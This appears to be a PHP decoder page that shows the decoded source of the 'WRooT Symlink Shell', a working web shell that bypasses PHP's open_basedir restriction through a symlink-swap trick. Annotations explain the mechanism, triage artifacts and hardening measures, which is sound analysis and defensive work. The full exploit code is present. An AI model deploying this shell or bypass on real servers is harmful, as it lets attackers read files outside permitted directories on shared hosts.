
PHP Decode

echo(base64_decode('JGZha2VkaXI9ImN4IjsKJGZha2VkZXA9MTY7CgokbnVtPTA7IC8vIG9mZnNldCBvZiBzeW..

Decoded Output download

b'$fakedir="cx"; // [analysis] name of the filler directory that gets nested $fakedep levels deep
$fakedep=16; // [analysis] nesting depth; also fixes the count of "../" segments used later ($fakedep-1)

// [analysis] Summary: decoded payload of a PHP web shell. Its own banner below labels it
// "WRooT Symlink Shell" and "PHP 5.2.11 5.3.0 symlink open_basedir bypass". It takes a path
// from the request, builds helper directories in the current working directory, creates a
// link named symlink<N> there, and prints an HTML link to it.
// Artifacts visible in this listing that are useful for triage: a nested cx/ directory chain,
// a "fakesymlink" entry, files named symlink0, symlink1, ..., and requests carrying the query
// string "webr00t=symlink&bypass=cp" together with a "file" parameter.

$num=0; // offset of symlink.$num

// [analysis] The target path comes straight from the request: GET "file" first, then POST "file".
if(!empty($_GET[\'file\'])) $file=$_GET[\'file\'];
else if(!empty($_POST[\'file\'])) $file=$_POST[\'file\'];
else $file="";

// [analysis] Banner and input form. $file is reflected through htmlspecialchars(); no other
// validation of $file appears anywhere in this listing.
echo \'<PRE><img
src="http://img810.imageshack.us/img810/8043/webr00t12.png"><P>WRooT Symlink Shell <a
href="http://webr00t.info/"></a>
<p>PHP 5.2.11 5.3.0 symlink open_basedir bypass
<p>Daha Fazlas1: <a href="http://webr00t.info/">WRooT</a>
<p><form name="form"
 action="?webr00t=symlink&bypass=cp" method="post"><input type="text" name="file" size="50"
value="\'.htmlspecialchars($file).\'"><input type="submit" name="hym"
value="Create Symlink"></form>\';

// [analysis] Without a requested path only the form is shown.
if(empty($file))
    exit;

// [analysis] Precondition: the script needs write access to its working directory. A web-served
// directory that the PHP user cannot write to stops it here.
if(!is_writable("."))
    die("not writable directory");

// [analysis] $level is never read in this listing.
$level=0;

// [analysis] Create (if missing) and descend into cx/cx/.../cx, $fakedep levels deep.
// The results of mkdir() and chdir() are not checked.
for($as=0;$as<$fakedep;$as++){
    if(!file_exists($fakedir))
        mkdir($fakedir);
    chdir($fakedir);
}

// [analysis] Climb back $fakedep-1 levels, stopping inside the first cx/; $as ends at 0.
while(1<$as--) chdir("..");

// [analysis] Split the requested path into components.
$hardstyle = explode("/", $file);

// [analysis] Recreate every non-empty component of the requested path as a real directory under
// cx/ (the last component included), descending as it goes and counting the depth in $as.
for($a=0;$a<count($hardstyle);$a++){
    if(!empty($hardstyle[$a])){
        if(!file_exists($hardstyle[$a])) 
            mkdir($hardstyle[$a]);
        chdir($hardstyle[$a]);
        $as++;
    }
}
// [analysis] One extra step accounts for the first cx/ level, so the loop below returns to the
// directory the script started in.
$as++;
while($as--)
    chdir("..");

// [analysis] Remove any leftover "fakesymlink" from an earlier run (directory or link); errors
// are suppressed with @.
@rmdir("fakesymlink");
@unlink("fakesymlink");

// [analysis] "fakesymlink" becomes a symlink to the bottom of the $fakedep-deep cx/ chain.
@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// [analysis] Create symlink<N> whose target string is "fakesymlink/" + ($fakedep-1) x "../" +
// $file. While "fakesymlink" still points into the cx/ chain, that string resolves to the decoy
// tree created above. $num is incremented until a free name succeeds; because failures are
// suppressed and never inspected, this loop does not terminate if symlink() keeps failing.
// this loop will skip allready created symlinks.
while(1)
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
"symlink".$num))) break;
    else $num++;

// [analysis] "fakesymlink" is swapped from a symlink to a plain directory. The relative target
// stored in symlink<N> is unchanged but now resolves upward from the working directory instead
// of into the decoy tree. This swap after link creation is what the banner calls the
// open_basedir bypass - presumably the path restriction was evaluated only at the time
// symlink() was called; confirm against the advisories for the PHP versions named above.
// Defensive notes: keep PHP patched, add symlink to disable_functions where it is not needed,
// have the web server refuse symlinks it does not own (Apache: SymLinksIfOwnerMatch rather than
// FollowSymLinks), and deny the PHP user write access to web-served directories.
@unlink("fakesymlink");
mkdir("fakesymlink");

// [analysis] Final output is an HTML link to ./symlink<N>. $num is concatenated unescaped, but it
// is an integer counter set only inside this script.
die(\'<FONT COLOR="RED">check symlink <a
href="./symlink\'.$num.\'">symlink\'.$num.\'</a> file</FONT>\');'


Original Code

echo(base64_decode('JGZha2VkaXI9ImN4IjsKJGZha2VkZXA9MTY7CgokbnVtPTA7IC8vIG9mZnNldCBvZiBzeW1saW5r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'));

Function Calls

base64_decode 1

Variables

None

Stats

MD5 edfa147d47f5fa10f60e87d23f9aa747
Eval Count 0
Decode Time 42 ms